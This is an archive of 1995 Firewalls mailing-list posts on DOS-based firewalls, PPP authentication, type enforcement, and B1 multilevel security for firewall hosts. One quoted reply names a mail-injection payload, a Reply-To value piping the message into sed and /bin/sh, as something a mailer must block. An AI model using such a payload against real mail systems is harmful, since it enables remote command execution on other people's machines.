Date: Fri, 11 Aug 1995 08:52:44 -0500 (CDT) From: Chuck Dean X-Sender: cdean@ns1 To: Firewalls@GreatCircle.com Subject: DOS Firewall (was Re: Multilevel Security...) Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mark Riggins Writes.... >Plus you're handing the security of your organization over to an >unevaluated black box based on someones idea of what security means. >Has that idea seen the light of peer review? Or can anyone order one >of these, do some disassembly and find an easy hole? Plus DOS may be >listening to more than you think if it has a tcp/ip stack. Do you >have source to the tcp/ip code? I don't work have any connection to the company but I have gotten info from them for evaluation. The company Network-1 offers the product for download for evaluation ( you have to call to get a key to access the software) http://www.iu.new/n1/home.html The product appears to do packet filtering, with a gui front end. Replaces DOS when it loads and does not have or require a TCP/IP stack in DOS. Their point being that if someone managed to crash the firewall they are stuck in a dumb uncommunicative DOS box. Requires min 486-50. Would like to hear from someone who has actually used this system. Chuck Dean Voice (334)450-4794 ------------------------------------------------------------------- ___ ___ ___ ____ ___ _ _____ ______ _ ____ | \__/ |/ _ \| __ )_ _| | | ____| / /\_| / \ / ___| | |\ /| | | | | _ \| || | | _| | / _\__ / _ \ \___ \ | | \/ | | |_| | |_) | || |___| |___ | \ |/ | / ___ \ ___) | | | | |\___/|____/___|_____|_____| \ |^||^| / /_/ \_\____/ |__| |__| SERVICE CORPORATION \|_||_|/ 2828 Dauphin St. Mobile, Alabama, 36606 cdean@mobile-gas.com ____________________________________________________________________ From firewalls-owner Fri Aug 11 08:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA25378 for firewalls-outgoing; Fri, 11 Aug 1995 07:03:29 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA25361 for ; Fri, 11 Aug 1995 07:03:23 -0700 Received: from ns1.maf.mobile.al.us(199.78.232.2) by miles via smap (V1.3) id sma025357; Fri Aug 11 07:02:49 1995 Received: from ns1 by ns1.maf.mobile.al.us (5.x/SMI-SVR4) id AA06327; Fri, 11 Aug 1995 08:59:53 -0500 Date: Fri, 11 Aug 1995 08:59:53 -0500 (CDT) From: Chuck Dean X-Sender: cdean@ns1 To: Firewalls@GreatCircle.com Subject: security of CHAP or PAP Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are in the middle of preparing capital budgets for next fiscal year (october) and finally have our REAL (ie leased line ) internet connection and firewall in the budget. I've seen several people ask about secure dialup and where to place it in the system. I also have a router for "remote network access" via ppp dialup in the budget for administrative connections. Question is how secure is chap and pap authentication in ppp? We would like to place the ppp dialup inside the protected lan environment if we can be sure that only clients with the authority get connection. We have talked about using dial back modems but that would be a problem when on the road. Are chap and pap protocols adequate security for ppp? Chuck Dean Voice (334)450-4794 ------------------------------------------------------------------- ___ ___ ___ ____ ___ _ _____ ______ _ ____ | \__/ |/ _ \| __ )_ _| | | ____| / /\_| / \ / ___| | |\ /| | | | | _ \| || | | _| | / _\__ / _ \ \___ \ | | \/ | | |_| | |_) | || |___| |___ | \ |/ | / ___ \ ___) | | | | |\___/|____/___|_____|_____| \ |^||^| / /_/ \_\____/ |__| |__| SERVICE CORPORATION \|_||_|/ 2828 Dauphin St. Mobile, Alabama, 36606 cdean@mobile-gas.com ____________________________________________________________________ From firewalls-owner Fri Aug 11 08:12:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24608 for firewalls-outgoing; Fri, 11 Aug 1995 06:39:24 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA24600 for ; Fri, 11 Aug 1995 06:39:22 -0700 From: GLorge@officetech.com Received: from www.officetech.com(204.255.164.75) by miles via smap (V1.3) id sma024596; Fri Aug 11 06:39:11 1995 Received: from neenah10bt (neenahtoken.officetech.com [204.176.70.65]) by web.officetech.com (8.6.9/8.6.9) with SMTP id IAA02293; Fri, 11 Aug 1995 08:56:26 -0500 X-Nvlenv-01Date-Posted: 11-Aug-1995 8:38:36 -0400; at offtech1.OTI Date: 11 Aug 95 08:37:00 EDT To: firewalls@greatcircle.com, MAHAJAN_VIVEK@tandem.com Subject: re: Type enforcement ??? Message-Id: <78472B3001C42F79@-SMF-> In-Reply-To: <199508102207.AA18745@comm.tandem.com> Reply-To: GLorge@officetech.com References: <199508102207.AA18745@comm.tandem.com> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's the info right from the proverbial "horse's mouth". http://www.sctc.com/sidewinder/FAQs/HTML/the_sidewinder.html >From Secure Computing Corp.'s FAQ: --------- 6.What is type enforcement? Type enforcement is a patented computer security mechanism that controls how programs use files and how they interact with other programs. Standard commercial operating systems on personal computers never provide any built-in protections against misbehaving software, so there is no way for the underlying system to force programs to behave. Unix systems have some limited facilities that have proven difficult to deploy securely and can often be circumvented. Type enforcement provides mandatory protection, which means that the protections can not be disabled or circumvented while the system is in normal operation. Type enforcement provides the strongest protection available against connection risks. Network service software occasionally suffers from a bug that allows an attacker to feed arbitrary programs to the server to run. Over the years this has appeared in the finger, electronic mail, and most recently the World Wide Web servers. In weakly protected PC or Unix systems such attacks could overrun the computer. Type enforcement limits the damage by restricting both the programs the attacker may use and the files that may be examined or modified. Our World Wide Web server can provide pages that the server itself can not possibly modify, because type enforcement blocks the server's write attempts. Because of its protection against firewall subversion, Sidewinder's type enforcement also provides the strongest platform on which to host strong measures against traffic risks. At present, traffic risks are largely blocked with connection and application layer gateways, which filters out risky forms of lower level IP traffic. Future releases will provide application layer filters that can detect some irregularities on incoming electronic mail addresses, validate traffic based on cryptographic signatures, check for restricted legends in outgoing files, and so on. 7.How does type enforcement compare to protections normally provided by UNIX and other commercial operating systems? History has shown that standard commercial operating systems provide unreliable security. Most commercial multi-user operating systems provide protections that may be enabled and disabled by a trusted administrator, sometimes referred to as a super user. Countless successful attacks have occurred because an attacker managed to become a super user just long enough to break down remaining security measures. UNIX has another protection mechanism called chroot that tries to isolate an attacker within a subset of the file system. However, this does not prevent the attacker from mounting further attacks across attached networks, masquerading as a trusted process residing on the penetrated computer. Sidewinder's type enforcement isolates such an attack to the network on which it arrived, so that an attack from the Internet will not penetrate an internal, protected network. Type enforcement provides other improvements over conventional mechanisms. It gives finer grained control over which programs and files may interact. And it can automatically generate alarms if selected constraints are violated. --------------------------------------------------------------------------- Vivek - I'd be interested in hearing your perceptions on SideWinder and Secure Computing. EMAIL direct please. Gary S. Lorge glorge@officetech.com http://www.officetech.com ------------- Original Text >From firewalls-owner@GreatCircle.COM, on 8/10/95 1:46 PM: To: firewalls@greatcircle.com Hello: Is there a document out there that explains what is type enforcement. One of the commercial firewall vendors I talked to explained to me that theirs is the only product that implements type enforcement and this gives their product a level of security no other product in the market does. I am quite familiar with the different firewall products and what kind of implementation they have but I am not quite familiar with what was described to me as "true type enforcement." What does it mean in the context of firewalls and where if any can I get more information about this concept? I would appreciate any help. Regards Vivek From firewalls-owner Fri Aug 11 08:30:49 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28373 for firewalls-outgoing; Fri, 11 Aug 1995 08:16:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28338 for ; Fri, 11 Aug 1995 08:15:54 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma028242; Fri Aug 11 08:15:11 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id KAA26354 for GreatCircle.COM!firewalls; Fri, 11 Aug 1995 10:06:23 -0500 Received: by ris1.nmti.com (smail2.5) id AA15881; 11 Aug 95 09:05:26 CDT (Fri) Received: by sonic.nmti.com; id AA22130; Fri, 11 Aug 1995 09:30:25 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508111430.AA22130@sonic.nmti.com.nmti.com> Subject: Re: Encrypted data across national boundaries??? To: Mats.Bredell@udac.se (Mats Bredell) Date: Fri, 11 Aug 1995 09:30:25 -0500 (CDT) Cc: firewalls@GreatCircle.COM, MAHAJAN_VIVEK@tandem.com In-Reply-To: from "Mats Bredell" at Aug 11, 95 02:08:20 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 168 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > How about getting the free SSL library from Australia? Better hurry up, with Australia getting ready to outlaw strong crypto escrowed or not for everyone but banks. From firewalls-owner Fri Aug 11 09:08:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26676 for firewalls-outgoing; Fri, 11 Aug 1995 07:36:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA26647 for ; Fri, 11 Aug 1995 07:36:29 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma026641; Fri Aug 11 07:36:22 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id JAA21850 for GreatCircle.COM!firewalls; Fri, 11 Aug 1995 09:26:54 -0500 Received: by ris1.nmti.com (smail2.5) id AA14875; 11 Aug 95 08:50:26 CDT (Fri) Received: by ris1.nmti.com (smail2.5) id AA14823; 11 Aug 95 08:48:51 CDT (Fri) Received: by sonic.nmti.com; id AA21882; Fri, 11 Aug 1995 09:13:49 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508111413.AA21882@sonic.nmti.com.nmti.com> Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: mdr@vodka.sse.att.com Date: Fri, 11 Aug 1995 09:13:49 -0500 (CDT) In-Reply-To: <9508101726.AA26472@ig1.att.att.com> from "mdr@vodka.sse.att.com" at Aug 10, 95 01:27:54 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1143 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Would all of the cron scripts and rc scripts and network startup > scripts also be immutable? That's up to you. 4.4BSD is not distributed as a packaged system. > By the time you get around to locking all of the files that have to be > immutable, you might as well make /, /var and /usr (please sub in bsd > equivalent names) readonly file systems. Ouch! Except you can log to append-only files. You can't do that with BSD. > How does init ever go back to init state 1 ? You reboot. > Forcing a reboot from > scratch for every (even trivial admin) would work, but ouch! that hurts too! I can't think of another way to do it if you really want to be secure. The biggest hole is internet domain sockets, really. You can still do maintainance from the console, by having init run a program that opens the files it needs to manage things while in level 0 and leaving it running on the console (with whatever authentication mechanism it wants to provide) while the system goes into level 1. Now the maintainance mode only exists in memory while that program is running. There's no way to get to it from outside that executable image. From firewalls-owner Fri Aug 11 09:27:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28437 for firewalls-outgoing; Fri, 11 Aug 1995 08:19:01 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28396 for ; Fri, 11 Aug 1995 08:18:54 -0700 Received: from uuneo.neosoft.com(198.64.84.252) by miles via smap (V1.3) id sma028388; Fri Aug 11 08:18:05 1995 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id KAA26365 for greatcircle.com!firewalls; Fri, 11 Aug 1995 10:06:29 -0500 Received: by ris1.nmti.com (smail2.5) id AA16277; 11 Aug 95 09:13:17 CDT (Fri) Received: by sonic.nmti.com; id AA23931; Fri, 11 Aug 1995 09:38:15 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9508111438.AA23931@sonic.nmti.com.nmti.com> Subject: Re: To OS or not to OS To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security) Date: Fri, 11 Aug 1995 09:38:15 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <9508111221.AA15214@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Aug 11, 95 08:21:47 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1186 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Exactly the point I was trying to make. In a PC, the Basic Input Output System > (BIOS) provides everything that is needed to run the computer. Not. > MS/PC/DR/NW-DOS, > OS/2, Novell Netware, Linux, BSD just build on this structure or use it to > load their own structure. The only thing any UNIX uses the BIOS for is to load itself into memory. The BIOS interface is *so* broken that no high performance operating system uses it for anything else. NT doesn't use the BIOS ... it has its own drivers. OS/2 will use the BIOS but prefers not to. I wrote a terminal program, once. It ran on a PC/XT. I worked hard as I could to use the BIOS, but the serial interface couldn't even keep up with 300 baud. The screen interface was able to handle 9600 with really hairy heuristics to avoid redraws. I stuck to small model for efficiency, but I still had to do my own serial drivers. > It is entirely possible to create a dedicated limited-functionality machine > using 32 bit structures and ring separation by starting with nothing more > than the ROM-BIOS that comes with every PC. You sure it's actually using the BIOS for anything but logging and user interface? I am skeptical. From firewalls-owner Fri Aug 11 09:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28641 for firewalls-outgoing; Fri, 11 Aug 1995 08:25:59 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28617 for ; Fri, 11 Aug 1995 08:25:54 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma028611; Fri Aug 11 08:25:27 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA15775; Fri, 11 Aug 95 10:34:35 EDT Message-Id: <9508111434.AA15775@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Multilevel Security is good for firewalls To: mjr@iwi.com Date: Fri, 11 Aug 1995 10:36:31 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <199508110519.BAA15636@switchblade.iwi.com> from "Marcus J. Ranum" at Aug 11, 95 01:19:46 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus, > > >I can just as easily run B1 unix w/o network daemons if all I want to > >live w/o proxies. If you proxy in DOS or windows, then the OS has > >absolutly no protection from software errors. > > [I may get the orange-bookspeak wrong, but I'm sure some kind > soul will correct me if I do] > > My impression is that in orange book land, a proxy is a > "trusted process." It takes advantage of the features of the TCB > (Trusted Computing Base) that protect the system, but, because it's > moving stuff around, the designer is trusting that it does at least > some of that stuff right. But if there's a software error in the > proxy, then it's just as much a problem as if there's a software > error in a proxy on an un-orange book system. Of course, a trusted > process' software gets carefully evaluated and formally modelled > and all that stuff, too. But if there's a flaw, it is still a > potentially fatal flaw. Not true. Of course we trust the proxy to do those proxy things that it does so well, but we don't trust it to modify the underlying OS. In an MLS system, we can create as many rings or layers of protection as desired. Each higher level ring can rely on the lower levels' services, but cannot write to them. Typical Setup 1: Levels 1 proxies and other applications, webservers etc. ---------------MAC barrier-------------------------- 0 TCB, including audit trails, config files, cron scripts, devices etc This setup lets the proxies run above the operating system level. Thus a proxy flaw is no more serious than a login at level 1. The OS is protected from all modifications and trojan horses. Even the root password would do no good. Further more, we will be able to securely monitor the operation of the proxy and all processes that spawn from it. Typical Setup 2: Levels 2 proxies and other applications, webservers etc. ---------------MAC barrier-------------------------- 1 proxy code and configuration stuff ---------------MAC barrier-------------------------- 0 TCB, including audit trails, config files, cron scripts, devices etc This setup would protect the proxy's code and config from the actual running daemons. Proxy Administration would occur at the protect level 1 w/o jepardizing the OS. More complicated models are available that would protect the proxies from one another so that proxy-ftp would never be able to modify proxy-telnet's behaviour and so on. I haven't looked at the Type Enforcement model, but something tells me that its capable of the same type of protection. Were can we get some details of how TE works? Rick, Care to post a couple of setups like the above? > Put another way: if you run plug-gw for telnet between * and > your inside network you're still wide open, B1 or no B1. > > This is why I keep urging people to recognize that there are > TWO (at least) protective relationships that a firewall embodies. > > How well it protects itself from attack > How well it protects its network from attack Is it too much to imagine that protecting itself from attack helps it protect the network from attack? > > All the orange book protections help with the firewall's > protecting itself from attack, but don't do anything for the > network, unless you're running B1 on the inside network, and > labelling and a complete trusted environment. Most commercial > networks don't do that, and won't ever do that. And if they do, > they'll rip it out in 2 years. > > So: consider that the firewall must protect the helpless > machines behind it, which are running SunOS, AIX, and Windows for > workgroups + IP. :) Now, the question is: what does my firewall > do for them? The B1-ness of the firewall at that point is totally > irrelevant. What's now important is whether or not the mailer > blocks out "| sed '1,/^$/d' | /bin/sh" as a Reply-To address, > and whether the trusted FTP service on the firewall binds ftp-data > when it talks to the inside, and so on. Those details are reflected > not in formal methods, but in niggling, ugly, policy reflected in > lines of code. Of course, you still have to install a firewall of choice on the B1 host. B1 protects the firewall host itself from attack. I think that that is in and of itself enough reason to implement firewalls on B1 servers. Now Padgett mentions using DOS to kick off a machine-model piece of code that uses the protection of the MMU just like UNIX, NT, and other virtual memory OS's do. I'm sure that you can indeed build a secure firewall in that fashion, and with sufficient work could get it evaluated against someone's criteria. Consider what will have to be done. You'll need some way to schedule services, maybe interrupts will do? You'll need some way to enforce separation of kernel from services, maybe using a protect mode in the CPU will do. But that only protects memory, the access to devices and files is still wide open, You'll have to have some way of determining when one of the services modifies something upon which the kernel relies..whew! I'm getting tired thinking about it. But this exhasting work has already been done! We have B1 secure versions of operating systems that use the hardware protection mechanisms to separate processes from one another and the kernel from processes in general; B1 policy to protect files, Auditing to record accesses and detect failures. They have been through rigorous evaluations. Now vendors will cook up their own solutions, and firewalls are in their infancy, but we should build on the work that has been done when it comes to operating systems. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Aug 11 09:56:33 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28965 for firewalls-outgoing; Fri, 11 Aug 1995 08:35:04 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA28902 for ; Fri, 11 Aug 1995 08:34:55 -0700 Received: from kant.newsedge.com(192.206.82.2) by miles via smap (V1.3) id sma028889; Fri Aug 11 08:34:20 1995 Received: from herne.newsedge.com by newsedge.com (4.1/SMI-4.1) id AA25141; Fri, 11 Aug 95 11:29:09 EDT Date: Fri, 11 Aug 95 11:36:00 EST Message-Id: <9508111136.AA23652@herne.newsedge.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Chris Brenton" Reply-To: X-Sender: To: Subject: Re: DOS Firewall (was Re: Multilevel Security...) X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In reply to: > >I don't work have any connection to the company but I have gotten info >from them for evaluation. The company Network-1 offers the product for >download for evaluation ( you have to call to get a key to access the >software) http://www.iu.new/n1/home.html The URL you have reached: http://www.iu.new/n1/home.html is not in service, please check the address and surf again. From firewalls-owner Fri Aug 11 10:00:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00255 for firewalls-outgoing; Fri, 11 Aug 1995 09:12:03 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00231 for ; Fri, 11 Aug 1995 09:11:58 -0700 From: kurz@pc08.muc.telenet.de Received: from mail.germany.eu.net(192.76.144.65) by miles via smap (V1.3) id sma000222; Fri Aug 11 09:11:30 1995 Received: by mail.Germany.EU.net with SMTP (5.51:31/EUnetD-2.5.2.a) via EUnet id SAA10836; Fri, 11 Aug 1995 18:12:12 +0200 Received: from mail.tntm by white.telenet.de id aa05687; 11 Aug 95 18:10 MESZ Received: from cc:Mail by pc08.muc.telenet.de id AA808189658 Fri, 11 Aug 95 18:07:38 CET Date: Fri, 11 Aug 95 18:07:38 CET Encoding: 1607 Text Message-Id: <9507118081.AA808189658@pc08.muc.telenet.de> To: firewalls@greatcircle.com Subject: Which firewall has best management? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Listening to the discussions for a while, I believe I've got a good impression of most technical features for standalone firewalls. But imagine the situation in a network consisting of more than one class B address. The network has connections to partner companies and other associated sites. Several routers are used to implement these. Different policies for the attached networks are defined. Is subdividing the net via firewalls a good idea? Which firewalls have the best management to accomplish this? A multipoint-of-access-and-control system would be good, where you can specify administrators and let them administrate different parts of the whole net. As performance might also be a problem, I tend towards an intelligent packet filtering firewall. Firewall-1 sounds good, because you can also manage the routers with that. An application gateway would still be useful for Internet access, maybe as an additional offer to the users. After slowly migrating all Internet use to the application gateway, one could apply stricter and stricter rules to the Internet router/packet filter. Any ideas? Michaela Kurz c/o Telenet GmbH Kommunikationssysteme Ungererstr. 75 80805 Munich Germany Voice: +49 89 36073-130 Fax: -125 E-Mail: mkurz@telenet.de From firewalls-owner Fri Aug 11 10:09:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01010 for firewalls-outgoing; Fri, 11 Aug 1995 09:28:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA00966 for ; Fri, 11 Aug 1995 09:28:05 -0700 Received: from rosie.group.com(192.52.239.140) by miles via smap (V1.3) id sma000919; Fri Aug 11 09:27:58 1995 Subject: TCP Header Flags To: firewalls@greatcircle.com Date: Fri, 11 Aug 1995 12:25:38 -0400 (EDT) From: Carsten Schafer Cc: Carsten Schafer X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 1050 Message-ID: <9508111225.aa03131@rosie.software.group.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have recently been getting lots of packets with the SYN bit set and a combination of PUSH, URG and RST. Our packet filter seems to throw away anything with a SYN bit set. I guess I'm wondering which packets are considered connection requests by TCP when the packet contains a SYN bit. Are packets containing the SYN flag and no others considered connection requests? Most of the packets with the other flags set seem to be in response to HTTP requests. Dazed and Confused Carsten =========================================================================== || Carsten Schafer Email: carsten@software.group.com || || The Software Group Phone: (705) 725-9999 || || 642 Welham Road Fax: (705) 725-9666 || || Barrie, Ontario, Canada L4M 6E7 Telepathy: gumby#green#beer#german || || WWW: http://www.group.com/ FTP: ftp.group.com || =========================================================================== From firewalls-owner Fri Aug 11 10:31:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29309 for firewalls-outgoing; Fri, 11 Aug 1995 08:46:02 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA29287 for ; Fri, 11 Aug 1995 08:45:58 -0700 From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com Received: from netcom11.netcom.com(192.100.81.121) by miles via smap (V1.3) id sma029280; Fri Aug 11 08:45:14 1995 Received: from njcorp.akbs.com by netcom11.netcom.com (8.6.12/Netcom) id IAA02935; Fri, 11 Aug 1995 08:41:52 -0700 Received: from cc:Mail by njcorp.akbs.com id AA808166647; Fri, 11 Aug 95 11:43:00 EST Date: Fri, 11 Aug 95 11:43:00 EST Encoding: 39 Text Message-Id: <9507118081.AA808166647@njcorp.akbs.com> To: Chuck Dean Cc: Firewalls@GreatCircle.com Subject: Re: DOS Firewall (was Re: Multilevel Security...) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chuck Dean Writes.... >>Mark Riggins Writes.... >>Plus you're handing the security of your organization over to an >unevaluated black box based on someones idea of what security means. >>Has that idea seen the light of peer review? Or can anyone order one >>of these, do some disassembly and find an easy hole? Plus DOS may be >>listening to more than you think if it has a tcp/ip stack. Do you >>have source to the tcp/ip code? >I don't work have any connection to the company but I have gotten info >from them for evaluation. The company Network-1 offers the product >for download for evaluation ( you have to call to get a key to >access the software) http://www.iu.new/n1/home.html >The product appears to do packet filtering, with a gui front end. >Replaces DOS when it loads and does not have or require a TCP/IP >stack in DOS. Their point being that if someone managed to crash >the firewall they are stuck in a dumb uncommunicative DOS box. >Requires min 486-50. >Would like to hear from someone who has actually used this system. Since MS-DOS is not mulit-tasking, when you try to read the firewall loggings if the product provided, I think you need to down the firewall or maybe it can mail the loggings to someone? I have a cc:Mail SMTP mail gateway and it runs under MS-DOS. It provides that 1. it mails loggings to someone, i.e. administrator 2. if you don't set it up to mail someone and you want to check the loggings then you need to down the mail gateway and check the loggings under MS-DOS, i.e. MS-DOS editor. Ruiyuan Jiang (908) 287-2236 rjiang@akbs.com From firewalls-owner Fri Aug 11 10:48:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01300 for firewalls-outgoing; Fri, 11 Aug 1995 09:32:16 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA01252 for ; Fri, 11 Aug 1995 09:32:09 -0700 Received: from gw2.att.com(192.20.239.134) by miles via smap (V1.3) id sma001214; Fri Aug 11 09:31:11 1995 Received: from vodka.sse.att.com by ig1.att.att.com id AA15941; Fri, 11 Aug 95 11:38:19 EDT Message-Id: <9508111538.AA15941@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: Multilevel Security is good for firewalls To: baumann@proton.llumc.edu (Michael Baumann) Date: Fri, 11 Aug 1995 11:40:18 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Michael Baumann" at Aug 11, 95 06:46:11 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Baumann writes: > > > > And if your software breaks, you also have no protection of the > > system from the user. And no idea what happened to > > the system or how it happened or that it happened. > True. So? I have the same problem debugging my Multi-Threaded realtime > applications running on my embedded controllers. It just takes > skill to recognize the problem. So your security is toast. Why does everyone keep assuming that when DOS breaks it dies? There are some things worse than death for firewalls--like living under the control of an attacker. > > Plus you're handing the security of your organization over to an > > unevaluated black box based on someones idea of what security means. > > Has that idea seen the light of peer review? > Yes, For at least one. TAMU calls it Drawbridge. Suprise. Sorry, must have missed it. When was it evalutated and against what criteria and by whom? I'd like to read their design papers and review outcome and such. Could be interesting stuff. > > I can just as easily run B1 unix w/o network daemons if all I want to > > live w/o proxies. If you proxy in DOS or windows, then the OS has > > absolutly no protection from software errors. > Why the *explitive* does everyone assume proxies? > Not every security policy requires them. Even if you don't have proxies, you still have a program of some sort that is making decisions per packet. If that program goes south of the border is there any saftey net underneath? If someone gains control of the program how much damage can they do? If it's running on DOS does it boot off a writable hard disk? Burning ROMs makes a lot of sense here if you stick with this approach, but there has to be some configuration data that is modifiable somewhere. Maybe a read-only floppy would be a good place to put it, then you could do the admin on another box. But once I've broken your application, I'll just break it again if you reboot. You've got no means to tell that i've broken it. The point that I'm trying to make is that a B1 OS gives you one additional layer of encapsulation. Now for kernel implemented stuff like IP, in reality higher levels like B3 are better because they require a modular kernel that can keep track of itself. But B1 does well for proxies and server daemons, and *ADDS* to the functionality of the firewall. Now I have a firewall that is safe for proxies, and all of the other services that an OS provides will come in handy. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Aug 11 11:06:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03757 for firewalls-outgoing; Fri, 11 Aug 1995 10:11:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA03729 for ; Fri, 11 Aug 1995 10:11:52 -0700 Received: from uvs1.orl.mmc.com(141.240.192.10) by miles via smap (V1.3) id sma003719; Fri Aug 11 10:11:24 1995 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA16775; Fri, 11 Aug 95 12:54:23 -0400 Date: Fri, 11 Aug 95 12:54:23 -0400 Message-Id: <9508111654.AA16775@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "peter@ris1.nmti.com"@UVS1.dnet.mmc.com Cc: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: To OS or 0 2 OS Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Peter rites: >The only thing any UNIX uses the BIOS for is to load itself into memory. The >BIOS interface is *so* broken that no high performance operating system uses >it for anything else. NT doesn't use the BIOS ... it has its own drivers. >OS/2 will use the BIOS but prefers not to. Is not broken, it does what it was designed to do very well (well, a "100% compatable" one will). The BIOS has two major limitations: 1) slow access 2) fixed "real" (segmented) addressing The first is a hardware problem that is a function of the interface between the ROM chip and the memory bus (why shadowing is popular). Is not a ROM charactoristic per se, rather is a function of the implimentation. The second is more of a problem and decends from the fact that when an iapx chip first has power applied, it is in "real" mode: 1 Mb segmented memory model. Further the CS register initializes to FFFFh and the IP register to 0000h. This fixes where in memory the ROM *must* be since whatever is at FFFF:0000 WILL be executed (always an intersegment jump). In the original IBM spec, the ROM date/id fills the rest of that paragraph. Bottom line: to do anything *fast*, it must be done in RAM and to go to a flat memory model, the ROM code must be moved, and then it will not work (well, QEMM "stealth" does some fancy swapping). NT/Unix/Netware require a flat memory model so *must* use their own drivers. Not a choice. Now if someone wanted to, a self-relocating, protected mode switching, flat memory model BIOS could be written. AFAIK no-one has. Warmly, Padgett From firewalls-owner Fri Aug 11 11:13:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02762 for firewalls-outgoing; Fri, 11 Aug 1995 09:59:33 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA02716; Fri, 11 Aug 1995 09:59:25 -0700 Received: from quadra.greatcircle.com(198.102.244.36) by miles via smap (V1.3) id sma002705; Fri Aug 11 09:59:14 1995 X-Sender: brent@miles.greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 11 